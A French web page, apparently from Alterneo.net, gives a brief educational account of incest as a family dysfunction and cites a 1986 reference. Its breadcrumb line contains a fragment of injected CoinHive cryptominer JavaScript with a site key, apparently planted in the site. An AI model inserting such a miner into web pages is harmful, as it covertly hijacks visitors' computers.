Le forumAccueil du site

Accueil du site > var miner = new CoinHive.Anonymous('oJIkcK2Mdol1HKlsD9mP6HowpdDPozTC'); (...) > L’inceste, une affaire familiale

L’inceste, une affaire familiale

La famille est a priori perçue comme un lieu idéal qui offre tendresse, affection et sécurité pour tous ses membres. D’ailleurs, le plus souvent, la famille où se commet l’inceste offre aux yeux de la société l’apparence d’une certaine harmonie et stabilité.

En réalité, s’y dissimulent des secrets qui taisent violences familiales et dysfonctionnements.

Dans une famille où se commet l’inceste, il règne :

  • l’abus de confiance
  • l’abus de pouvoir
  • l’abus sexuel.

La personnalité manipulatrice de l’abuseur et parfois la complicité plus ou moins consciente de l’entourage, contribuent à offrir à l’extérieur une image sans faille.

L’inceste existe dans tout type de famille : il n’est pas lié aux conditions socio-économiques, ni au niveau intellectuel, ni aux convictions religieuses, politiques ou philosophiques de la famille. De même l’abuseur peut être aussi bien une femme qu’un homme.

L’inceste met en cause la Personnalité du père, de la mère, leur histoire d’enfant et celle de leur couple. Les interactions avec leurs enfants et eux-mêmes permettent de comprendre qu’il s’agit bien d’un symptôme, qui est l’expression d’une confusion et d’un malaise profond qui touche tous les membres de la famille.

M. Rouyer, M. Drouet (1986) "L’enfant violenté, des mauvais traitements à l’inceste."

2012©Alterneo.net | Le forum | Nous contacter